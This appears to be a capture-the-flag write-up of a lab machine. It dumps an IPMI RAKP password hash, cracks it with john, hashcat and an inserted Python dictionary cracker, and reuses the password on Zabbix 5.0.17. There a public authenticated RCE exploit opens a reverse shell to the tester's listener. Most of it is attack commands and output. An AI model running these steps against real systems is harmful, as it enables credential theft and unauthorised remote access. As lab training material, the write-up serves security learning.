Password Hash Retrieval


The target instance of the IPMI service was confirmed to be vulnerable to both [[shibboleth_cve-2013-4782#cve-2013-4782|CVE-2013-4782]] and [[Shibboleth_CVE-2013-4786#CVE-2013-4786|CVE-2013-4786]]. As the Administrator user is present, I will be exploiting [[shibboleth_cve-2013-4786#cve-2013-4786|CVE-2013-4786]] to retrieve its password hash.

┌──(kali㉿kali)-[~/…/htb/labs/shibboleth/ipmiPwner]
└─$ sudo -E python3 ipmipwner.py --host $IP -u Administrator -oH ./Administrator.hash
[*] Checking if port 623 for host 10.10.11.124 is active
[*] the username: Administrator is valid                                                  
[*] saving hash for user: Administrator in file: "./Administrator.hash"
[*] the hash for user: Administrator
   \_ $rakp$a4a3a2a082160000c9539728dc6c28dff643875269e7331a86cf763b1c4dfa064e7ee49e024495bba123456789abcdefa123456789abcdef140d41646d696e6973747261746f72$f26d1dfcea57d31f9cbdd89f6e2bfd5e08f0430a

The password hash for the Administrator user is extracted. Under RAKP the BMC returns this HMAC-SHA1 (keyed with the user's password) in RAKP message 2 to any client that names a valid user, before that client has proven anything, so the hash is obtained without authenticating and can be cracked offline.

Password Cracking


┌──(kali㉿kali)-[~/…/htb/labs/shibboleth/ipmiPwner]
└─$ john ./Administrator.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (RAKP, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 128/128 AVX 4x])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovepumkinpie1  (10.10.11.124 Administrator)     
1g 0:00:00:00 DONE (2023-04-17 20:03) 1.333g/s 9961Kp/s 9961Kc/s 9961KC/s iluve.p..iargxe
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

John cracked the hash: the password for the Administrator user is ilovepumkinpie1.

Metasploit/hashcat


┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ msfconsole -q 
msf6 > 
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set OUTPUT_HASHCAT_FILE Administrator.hash.msf
OUTPUT_HASHCAT_FILE => Administrator.hash.msf
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > options
Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
 
   Name                  Current Setting                    Required  Description
   ----                  ---------------                    --------  -----------
   CRACK_COMMON          true                               yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE   ./administrator.hash.msf           no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                         no        Save captured password hashes in john the ripper format
   PASS_FILE             /usr/share/metasploit-framework/d  yes       File containing common passwords for offline cracking, one
                         ata/wordlists/ipmi_passwords.txt              per line
   RHOSTS                10.10.11.124                       yes       The target host(s), see https://github.com/rapid7/metasplo
                                                                      it-framework/wiki/Using-Metasploit
   RPORT                 623                                yes       The target port
   SESSION_MAX_ATTEMPTS  5                                  yes       Maximum number of session retries, required on certain BMC
                                                                      s (HP iLO 4, etc)
   SESSION_RETRY_DELAY   5                                  yes       Delay between session retries in seconds
   THREADS               1                                  yes       The number of concurrent threads (max one per host)
   USER_FILE             /usr/share/metasploit-framework/d  yes       File containing usernames, one per line
                         ata/wordlists/ipmi_users.txt
 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
 
┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ hashcat -a 0 -m 7300 Administrator.hash.msf /usr/share/wordlists/rockyou.txt --username
hashcat (v6.2.6) starting
 
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
5c89a303020f000079b01725c35a06c0c281730922a90fb06fcc688f5368af935cd78ba32f06046aa123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:ad1855159b8f141faf1c652e2fe66ba568cccca1:ilovepumkinpie1
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7300 (IPMI2 RAKP HMAC-SHA1)
Hash.Target......: administrator.hash
Time.Started.....: Mon Apr 17 19:39:28 2023 (2 secs)
Time.Estimated...: Mon Apr 17 19:39:30 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2887.0 kH/s (0.38ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests (total), 1/2 (50.00%) Digests (new), 2/2 (100.00%) Salts
Progress.........: 14794752/28688770 (51.57%)
Rejected.........: 0/14794752 (0.00%)
Restore.Point....: 7394304/14344385 (51.55%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ilovequay -> ilovemymum64.
Hardware.Mon.#1..: Util: 47%
 
Started: Mon Apr 17 19:39:26 2023
Stopped: Mon Apr 17 19:39:31 2023

The same hash can also be dumped with Metasploit's ipmi_dumphashes module and cracked with hashcat in mode 7300 (IPMI2 RAKP HMAC-SHA1). hashcat loaded two digests here, each with its own session nonces, and reports 1/2 as new because the other was already cached in its potfile from the earlier crack.
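The retrieval and cracking steps above reduce to one computation, shown here as an added example (not code from the page, nor from ipmipwner, john, hashcat or Metasploit): parse the hash lines in both the john ($rakp$) and hashcat (salt:hmac) forms, decode the RAKP message 2 fields (session IDs, nonces, BMC GUID, role byte, username) and verify candidates with the same HMAC-SHA1 comparison the crackers use. The two captured hashes are copied from this page; the hash used by the self-test is constructed with fresh nonces and the password hunter2.

```python
"""Offline verification and dictionary attack against IPMI 2.0 RAKP hashes.

Added example for this writeup; it is not code from ipmipwner, john, hashcat
or Metasploit.  It reimplements the check those tools perform: RAKP message 2
carries HMAC-SHA1(key = user's password, msg = SIDm | SIDc | Rm | Rc | GUIDc |
ROLEm | ULENm | UNAMEm), so a candidate password is confirmed by recomputing
that HMAC over the captured "salt".  The two hash lines below are copied from
the page; the self-test hash built by make_rakp_hash() is constructed.
"""
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional

HEX = set("0123456789abcdefABCDEF")

# ipmipwner output (john "$rakp$<salt>$<hmac>" format), copied from the page.
PAGE_JOHN_HASH = (
    "$rakp$"
    "a4a3a2a082160000c9539728dc6c28dff643875269e7331a"  # SIDm | SIDc | Rm
    "86cf763b1c4dfa064e7ee49e024495bb"                  # Rc
    "a123456789abcdefa123456789abcdef"                  # GUIDc (as sent by this BMC)
    "140d41646d696e6973747261746f72"                    # ROLE | ULEN | "Administrator"
    "$f26d1dfcea57d31f9cbdd89f6e2bfd5e08f0430a"
)

# Metasploit/hashcat line from the page, potfile style with the cracked
# plaintext appended after the second colon.
PAGE_HASHCAT_LINE = (
    "5c89a303020f000079b01725c35a06c0c281730922a90fb0"
    "6fcc688f5368af935cd78ba32f06046a"
    "a123456789abcdefa123456789abcdef"
    "140d41646d696e6973747261746f72"
    ":ad1855159b8f141faf1c652e2fe66ba568cccca1:ilovepumkinpie1"
)


def _is_hex(s: str) -> bool:
    return s != "" and len(s) % 2 == 0 and all(c in HEX for c in s)


def parse_rakp(line: str):
    """Return (salt, mac) bytes from a john "$rakp$salt$mac" line or a
    hashcat "[prefix:]salt:mac[:plaintext]" line."""
    line = line.strip()
    if line.startswith("$rakp$"):
        salt_hex, mac_hex = line[6:].split("$", 1)
        return bytes.fromhex(salt_hex), bytes.fromhex(mac_hex)
    parts = line.split(":")
    # The HMAC-SHA1 is the first 40-hex-char field; the salt is the field before it.
    for i in range(1, len(parts)):
        if len(parts[i]) == 40 and _is_hex(parts[i]) and _is_hex(parts[i - 1]):
            return bytes.fromhex(parts[i - 1]), bytes.fromhex(parts[i])
    raise ValueError("not a RAKP hash line")


def decode_salt(salt: bytes) -> Dict[str, object]:
    """Split the RAKP message 2 HMAC input into its IPMI fields."""
    if len(salt) < 58:
        raise ValueError("salt too short for the RAKP layout")
    role, ulen = salt[56], salt[57]
    if len(salt) != 58 + ulen:
        raise ValueError("salt length does not match the username length byte")
    return {
        "sid_m": salt[0:4].hex(),     # remote console session ID
        "sid_c": salt[4:8].hex(),     # BMC session ID
        "rand_m": salt[8:24].hex(),   # remote console random
        "rand_c": salt[24:40].hex(),  # BMC random
        "guid_c": salt[40:56].hex(),  # BMC GUID
        "role": role,                 # low nibble = privilege level (4 = Administrator)
        "priv_level": role & 0x0F,
        "name_only_lookup": bool(role & 0x10),
        "username": salt[58:].decode("ascii", "replace"),
    }


def rakp_hmac(password: str, salt: bytes) -> bytes:
    # HMAC zero-pads short keys, so this equals the spec's zero-padded K_UID.
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: the first candidate whose HMAC matches, else None."""
    salt, mac = parse_rakp(line)
    for cand in wordlist:
        cand = cand.rstrip("\r\n")
        if hmac.compare_digest(rakp_hmac(cand, salt), mac):
            return cand
    return None


def make_rakp_hash(username: str, password: str, role: int = 0x14) -> str:
    """Construct a john-format hash with fresh nonces (self-test only; a real
    capture comes from a BMC's RAKP message 2)."""
    uname = username.encode()
    salt = (os.urandom(4) + os.urandom(4) + os.urandom(16) + os.urandom(16)
            + os.urandom(16) + bytes([role, len(uname)]) + uname)
    return "$rakp$" + salt.hex() + "$" + rakp_hmac(password, salt).hex()


if __name__ == "__main__":
    for line in (PAGE_JOHN_HASH, PAGE_HASHCAT_LINE):
        info = decode_salt(parse_rakp(line)[0])
        print(f"user={info['username']!r} priv={info['priv_level']} "
              f"name_only_lookup={info['name_only_lookup']} guid={info['guid_c']}")
        print("  cracks to:", crack(line, ["password", "ilovepumkinpie1"]))
    demo = make_rakp_hash("Administrator", "hunter2")  # constructed
    print("constructed hash cracks to:", crack(demo, ["letmein", "hunter2"]))
```

Running it against a real wordlist is `crack(PAGE_JOHN_HASH, open("/usr/share/wordlists/rockyou.txt", errors="ignore"))`; the point of the decoder is that the username, the requested privilege level (0x14 here: Administrator, name-only lookup) and the BMC GUID are all readable from the salt before any cracking, which is why a single unauthenticated RAKP exchange is enough to enumerate accounts.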

Remote Code Execution


Earlier, I found that the target web server has a virtual host at zabbix.shibboleth.htb hosting an instance of Zabbix. I was unable to proceed at that point without valid credentials, so I will now test the IPMI credential against it.

Authentication succeeded, confirming that the Administrator password is reused between the BMC and Zabbix.

The footer indicates that it’s Zabbix 5.0.17
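Both of the checks just made through the browser, the credential-reuse login and the version read from the footer, can be scripted against the Zabbix JSON-RPC API. The following is an added example and not code from the page or from the exploit script; it assumes the Zabbix 5.0 API (POST to /api_jsonrpc.php, apiinfo.version without auth, user.login with "user" and "password"; 5.4 and later renamed "user" to "username"). The URL and credential are the writeup's, while the replies returned by the fake transport in the self-test are constructed to match the shape of real Zabbix responses.

```python
"""Scripted Zabbix checks: frontend version and a credential-reuse login test.

Added example for this writeup; not code from the original page or the
exploit script.  Targets the Zabbix 5.0 JSON-RPC API: POST to
/api_jsonrpc.php, apiinfo.version (must be called without "auth") and
user.login with "user"/"password" (Zabbix 5.4+ renamed "user" to "username").
The responses served by fake_zabbix() are constructed; nothing here touches a
network unless http_transport is used.
"""
import json
import urllib.request
from typing import Any, Callable, Dict, Optional

Transport = Callable[[str, bytes], bytes]


def http_transport(url: str, body: bytes) -> bytes:
    """Real transport: POST the JSON-RPC body and return the raw reply."""
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"Content-Type": "application/json-rpc"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read()


def build_request(method: str, params: Any, auth: Optional[str] = None,
                  req_id: int = 1) -> Dict[str, Any]:
    req = {"jsonrpc": "2.0", "method": method, "params": params, "id": req_id}
    if method != "apiinfo.version":  # apiinfo.version rejects an auth field
        req["auth"] = auth
    return req


def call(base_url: str, method: str, params: Any, auth: Optional[str] = None,
         transport: Transport = http_transport) -> Dict[str, Any]:
    url = base_url.rstrip("/") + "/api_jsonrpc.php"
    body = json.dumps(build_request(method, params, auth)).encode()
    return json.loads(transport(url, body))


def zabbix_version(base_url: str, transport: Transport = http_transport) -> str:
    return call(base_url, "apiinfo.version", [], transport=transport)["result"]


def zabbix_login(base_url: str, user: str, password: str,
                 transport: Transport = http_transport) -> Optional[str]:
    """Session token on success, None on a wrong password.  Any other API
    error (lockout, disabled account, ...) is raised so that it is never
    mistaken for 'password not reused'."""
    resp = call(base_url, "user.login", {"user": user, "password": password},
                transport=transport)
    if "result" in resp:
        return resp["result"]
    err = resp.get("error", {})
    if "incorrect" in str(err.get("data", "")).lower():
        return None
    raise RuntimeError(f"Zabbix API error: {err}")


def fake_zabbix(url: str, body: bytes) -> bytes:
    """Constructed stand-in for zabbix.shibboleth.htb used by the self-test."""
    req = json.loads(body)
    rid = req["id"]
    if req["method"] == "apiinfo.version":
        assert "auth" not in req, "apiinfo.version must be sent without auth"
        out = {"jsonrpc": "2.0", "result": "5.0.17", "id": rid}
    elif req["method"] == "user.login":
        p = req["params"]
        if p.get("user") == "blocked":  # constructed lockout reply
            out = {"jsonrpc": "2.0", "id": rid, "error": {
                "code": -32602, "message": "Invalid params.",
                "data": "Account is blocked for 30 seconds."}}
        elif p == {"user": "Administrator", "password": "ilovepumkinpie1"}:
            out = {"jsonrpc": "2.0", "id": rid,
                   "result": "0424bd59b807674191e7d77572075f33"}  # constructed token
        else:
            out = {"jsonrpc": "2.0", "id": rid, "error": {
                "code": -32602, "message": "Invalid params.",
                "data": "Login name or password is incorrect."}}
    else:
        out = {"jsonrpc": "2.0", "id": rid, "error": {
            "code": -32602, "message": "Invalid params.", "data": "Not authorised."}}
    return json.dumps(out).encode()


if __name__ == "__main__":
    base = "http://zabbix.shibboleth.htb"
    t = fake_zabbix  # swap for http_transport to query the live frontend
    print("version:", zabbix_version(base, transport=t))
    token = zabbix_login(base, "Administrator", "ilovepumkinpie1", transport=t)
    print("password reuse:", "confirmed" if token else "not confirmed")
```

Distinguishing "incorrect" from every other error is the part worth keeping: Zabbix rate-limits failed logins, and a lockout reply treated as a failed guess would silently turn a reuse check into a false negative.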

┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ searchsploit Zabbix 5.0.17
------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                        |  Path
------------------------------------------------------------------------------------------------------ ---------------------------------
Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)                                           | php/webapps/50816.py
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

An authenticated RCE exploit (EDB-ID 50816) is available for Zabbix 5.0.17; it needs valid credentials, which the reused Administrator password now provides.

┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ python3 zabbix_rce.py -h         
[*] this exploit is tested against Zabbix 5.0.17 only
[*] can reach the author @ https://hussienmisbah.github.io/
[!] usage : ./expoit.py <target url>  <username> <password> <attacker ip> <attacker port>

This exploit doesn’t have an assigned CVE

┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ python3 zabbix_rce.py http://zabbix.shibboleth.htb Administrator ilovepumkinpie1 10.10.14.7 9999
[*] this exploit is tested against Zabbix 5.0.17 only
[*] can reach the author @ https://hussienmisbah.github.io/
[+] the payload has been Uploaded Successfully
[+] you should find it at http://zabbix.shibboleth.htb/items.php?form=update&hostid=10084&itemid=33617
[+] set the listener at 9999 please...

The exploit calls back to the listener on port 9999:

┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.124] 34952
sh: 0: can't access tty; job control turned off
$ whoami
zabbix
$ hostname
shibboleth
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.124  netmask 255.255.255.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:967b  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:967b  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:96:7b  txqueuelen 1000  (Ethernet)
        RX packets 5961  bytes 912550 (912.5 KB)
        RX errors 0  dropped 28  overruns 0  frame 0
        TX packets 6905  bytes 2090524 (2.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 96670  bytes 9171958 (9.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 96670  bytes 9171958 (9.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial foothold established on the target system as the zabbix user via the authenticated Zabbix RCE.